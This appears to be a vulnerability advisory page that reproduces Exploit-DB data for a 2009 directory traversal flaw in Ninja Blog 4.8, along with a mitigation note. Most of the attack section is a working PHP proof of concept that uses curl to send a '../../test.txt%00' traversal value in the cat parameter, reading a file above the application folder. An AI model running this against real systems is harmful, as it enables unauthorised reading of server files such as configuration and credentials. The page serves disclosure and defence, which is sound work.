Ninja Blog 4.8 Path Disclosure Vulnerability

vendor:

Ninja Blog

by:

Danny Moules

9.3

CVSS

CRITICAL

Path Disclosure

CWE

Product Name: Ninja Blog

Affected Version From: Ninja Blog 4.8

Affected Version To: May also affect earlier versions

Patch Exists: YES

Related CWE: N/A

CPE: 2.3:a:ninjadesigns:ninja_blog:4.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ninja Blog 4.8 Path Disclosure Vulnerability

Due to insufficient validation of client-side data, an attacker can alter the path of files to be read to a file outside the intended directory. The following PoC will read a file named 'test.txt' one level above the application folder.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in any file operations.

Source

Exploit-DB raw data:

Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6

----

Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory.

The following PoC will read a file named 'test.txt' one level above the application folder.

---

<?php

$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = "http://www.example.com/ninjablog4.8/"; //Don't forget the trailing slash

$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);

echo("Getting data...\n");
$strDump = curl_exec($objCurl);

curl_close($objCurl);

echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");

?>

# milw0rm.com [2009-01-19]